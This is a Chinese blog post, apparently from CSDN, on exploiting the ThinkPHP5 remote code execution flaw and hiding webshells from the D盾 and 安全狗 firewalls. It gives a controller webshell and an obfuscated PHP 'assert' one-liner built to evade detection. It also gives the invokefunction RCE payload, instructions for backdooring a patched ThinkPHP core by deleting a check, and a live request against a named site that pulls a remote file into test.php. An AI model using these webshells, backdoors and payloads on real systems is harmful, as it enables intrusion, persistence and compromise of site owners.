php一下单后台立即提示,thinkphp下的Webshell&&php过D盾一句话

本文详细探讨了ThinkPHP5中的远程代码执行(RCE)漏洞,包括漏洞产生的原因、利用方式以及如何通过特定的Payload绕过WAF如D盾和安全狗。作者分享了两种绕过方法,并提供了相关的代码示例。此外,还提到了权限维持的思路,以及如何在ThinkPHP5.0.24版本中利用漏洞进行RCE。文章最后指出,这种做法对整体安全性不利,建议采取条件控制来管理漏洞入口。
摘要由CSDN通过智能技术生成

环境:

Thinkphp 5.0.15

PHP version:7.0.12

WAF: D盾 ,安全狗

Thinkphp 采用 MVC 模式  核心:模块 -> 控制器 –> 方法

思路:利用已经有的think 类包库 去做一些事情

利用已有的功能,顺便对D盾 绕过

方法:

Payload1:

Payload2:

代码:

namespace app\index\controller;use\think\App;classindex

{public function index($f,$shell)

{$a=newApp();$c=$a->invokeFunction($f,$shell);return ' sucess';

}

}

关于用这个的来源:

Thinkphp5 rce 漏洞 其中一个payload  是这样的

?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

漏洞原因:默认没有开启强制路由,路由控制不严谨,可以执行自己需要的类库

在think 类库中找到自己需要的功能,进行触发调用

先贴一个不需要thinkphp 环境下 过D盾 和安全狗的 马

{$reflect = new ReflectionFunction($function);return $reflect->invokeArgs($vars);

}$function='a'.'ssert';$vars=$_GET[1];

invokeFunction($function,$vars);?>

d185efc45ba0fbe96193d38addb90573.png

a06769bdc13176d082fa7750b12557f6.png

还有一种思路,创建类或者函数,进行包含绕过,有兴趣的可以自己试一下。、

然后对于thinkphp 权限维持的思路,因为本身内核存在RCE, -这里假设打了补丁的RCE 被某洞获得到权限

演示以thinkphp 最新版本 5.0.24

ef83ea473cc7b8c273b68890caae4063.png

在Think\app.php 文件内,把! 删掉 就可以继续RCE 了 (只是提供一种维持思路)

后来想了下,这样对整个站点都不安全了,不适合维持。可以在前面在加一段IF 开关条件  符合就不执行preg_math 这一段,对RCE的漏洞入口进行一个管理操作~

就可以继续任意执行了

tp 在 5.0.0<=ThinkPHP5<=5.0.18 、5.1.0<=ThinkPHP<=5.1.10。  在模板调用的时候 有任意文件包含漏洞,可以自己写一个,当作后门。

附赠:

关于thinkphp rce  绕WAF or 宝塔

这里用了宝塔做测试:

http://yishangtv.com/index.php?s=&echod=copy(%22http://www.letv.cloud/ad.txt%22,%22test.php%22)

_method=__construct&filter=assert&method=get&server[REQUEST_METHOD]=echod

思路:绕敏感函数,和正则匹配

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值